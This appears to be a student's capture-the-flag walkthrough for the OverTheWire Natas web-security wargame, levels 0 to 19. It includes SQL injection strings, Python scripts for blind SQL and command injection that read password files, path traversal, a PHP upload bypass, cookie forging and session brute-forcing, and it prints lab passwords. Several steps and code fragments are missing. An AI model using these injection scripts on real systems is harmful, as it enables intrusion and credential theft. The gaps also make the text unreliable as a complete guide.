Professional Documents
Culture Documents
Natas - Walkthrough
Natas - Walkthrough
Natas - Walkthrough
SNP - IE2012
G.D.I.Bomal - IT22032188
00/00/2023
The password to access Natas0 is given on the website itself.
Natas 0:
For this level to obtain the password all you need to do is inspect the webpage by
right-clicking anywhere on the screen, then extend the tags, and the password is given as a
comment.
Natas 1:
For this level right-clicking has been blocked.
So in order to access the inspect menu all you need to do is use the keyboard.
Press Ctrl + Shift + I to access the inspect menu without right-clicking and expand the tags,
the password will be given as a comment
Natas 2:
For this level, we can right-click again but there is no commented password, instead, there is
an image with the src of “files/pixel.png”
Then we can open the users.txt file and get the password
Natas 3:
In this level there is a comment saying “No more information leaks!! Not even Google will
find it this time…”, suggesting that the data has been hidden from Google.
This is where the “robots.txt” file comes in, the robots.txt file is a file used to manage crawler
traffic to the site, and also to keep some files off Google.
To see these files we just need to add the file path “/robots.txt” to the end of the URL of the
natas3 page
Here we can see a file is hidden from Google, so let's put that at the end of the URL now
(replace the /robots.txt with /s3cr3t/)
Now access the users.txt and get the password for the next level.
Natas 4:
To get the password for this level we need to visit the website from the natas5 link, to do this
we can use the Firefox browser or the burp suite software (need to create an account).
Now right-click it and click “send to repeater”, then go to the repeater option and change the
referer to the given link in the natas4 webpage and click send, then scroll down in the
responses section to get the password for natas5
Natas 5:
For this level, it says that we are not logged in. so all we need to do is change the cookies in
the inspect menu
To access the file we can simply add “/includes/secret.inc” to the end of the natas6 URL
We get the following page:
We can copy and paste this code into the natas6 webpage and get the password for natas7
Natas 7:
In this level, we can see 2 buttons, home and about. The buttons don't necessarily do
anything so we go to the inspect menu and see that they have said “hint: password for
webuser natas8 is in /etc/natas_webpass/natas8”
Now lets click any of the buttons and edit the URL.
Change the URL from
“http://natas7.natas.labs.overthewire.org/index.php?page=<home/about>” to
“http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8” and
you should get the password
Natas 8:
In this level, they have encrypted the password and given it.
The encryptions are base64, strrev and bin2hex (base64 encryption, string reverse, and
binary to hex) so let's decrypt it
starting with bin2hex:
a /etc/natas_webpass/natas11
Since the password has the letter ‘A’ in it and since the search is case insensitive the
password appeared.
Natas 11:
In this level, we have to go through a long decryption process to get the password.
First let's start with the basic steps:
1. Go to the cookies section and find the “data” cookie, make sure its URL decoded,
and copy it
2. We can take that and decrypt it using a base64 decoder
3. Now that will be out cypher text for the XOR decryption
4. To get the plain text, we will have to JSON encode the default data variable in the
source code
5. Finally we use our cypher text and the plain text we got to get the key for the next
decryption
6. Now that we have the Key (KNHL) we can go to the cyber chef website and start
decoding/encoding to get the new cookie
7. 1st we enter the plain text into the input field, then select the XOR recipe and enter
the “Key” under UTF8 and bake to get a new string
8. Next put the output into the input field and change the recipe to a base64 encoder
like so and bake, the result is the new cookie:
9. Finally, we take that output and replace the value of the data cookie in the natas11
website with the new output and refresh the page
Natas 12:
For this level, we have to upload something. And in the source code, we can try to upload a
.php file to get the password.
First, let's make a .php file with any file name and the extension of .php and lets write this in
it
Now we once again need burp suite to intercept the request and change the uploaded
extension from .jpg to .php again
Load up burp and go to proxy, open up their browser and login to natas12, and SELECT the
.php file there
Before uploading, turn intercept on in burp suite and then upload the file
Then right-click on the burp suite app and click send to repeater
Then change the extension of the file name from .jpg to .php
6. Now click send and copy the directory given in the response section
7. And paste it after the URL with the same command you used in level 12 like so and
you will get the password
8. Copy the password given in the end and move on to the next level
Natas 14:
For this level, we can bypass the username and password checks by entering an “always
true” statement
Junk” OR 1=1# is an always true statement
The # is used so that MySQL ignores everything after it and only executes whatever is
before it
Natas 15:
For this level, we have to do a blind-based SQL injection to leak out the password using a
Python program
We need to create a Python program to loop through all the possible characters that could
be part of the password
import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits
characters = ascii_lowercase + ascii_uppercase + digits
# print(characters)
username = 'natas15'
password = 'TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB'
url = 'http://%s.natas.labs.overthewire.org/' % username
session = requests.Session()
seen_password = list('')
done = False
while(not done):
for ch in characters:
#print("trying", "".join(seen_password) + ch)
response = session.post(url, data={"username": 'natas16" AND
BINARY password LIKE "' + "".join(seen_password) + ch + '%" #'},
auth=(username, password))
content = response.text
if ('user exists' in content):
seen_password.append(ch)
break
print("trying", "".join(seen_password) + ch)
if len(seen_password) == 32:
done=True
Run that code and wait and the password will generate slowly
Natas 16:
For this level, we have the $key variable which will check the characters to see whether it is
in the blacklist or not, the command will run only if the character is not in the blacklist
grep uses regular expressions, so we should use special characters like ^ (caret) that show
the starting character of the string.
Imagine ^a. If the letter a is the very first thing in the text, we won't see any results. To know
if something is right, we check if nothing shows up. So, we'll make a list and add the letters
that don't show up.
Again we need to use a python code to leak the password for natas17
This time we have changed the code a bit to this:
import requests
import re
from string import ascii_lowercase, ascii_uppercase, digits
characters = ascii_lowercase + ascii_uppercase + digits
# print(characters)
username = 'natas16'
password = 'TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V'
url = 'http://%s.natas.labs.overthewire.org/' % username
session = requests.Session()
seen_password = list('')
done = False
while(not done):
for ch in characters:
#print("trying", "".join(seen_password) + ch)
response = session.post(url, data={"needle": "anythings$(grep
^" + "".join(seen_password) + ch + " /etc/natas_webpass/natas17)"},
auth=(username, password))
content = response.text
itreturned = re.findall('<pre>\n(.*)\n</pre>', content)
if (not itreturned):
seen_password.append(ch)
print("tyring", "".join(seen_password) + ch)
break
if len(seen_password) == 32:
done = True
To overcome this issue we will use the sleep function. So whenever a character is in the
password the query will sleep for a second and we can use that to calculate the time
differences and if the time difference is greater than expected, then it means that the
character exists in the password
import requests
print("")
We also see that there is a maxid variable set to 640 so there are only 640 IDs to go through
Now that we know this, we can start up burp suite and do the following steps
1. First open up the browser from burp and login to natas18
2. Now turn on intercept and login without credentials and we should see a ine that
shows PHPSESSID and a value, if that is there then we continue
10. Now we can just click start attack and wait until we see an entry were we logged in
as an admin, click it, go to the responses tab and scroll and you should find the
password
Natas 19:
In this level, its the same code as last time but this time the SessionIDs are no longer
sequential
So lets try the same thing again but this time we get a different PHPSESSID, im assuming
they have encrypted it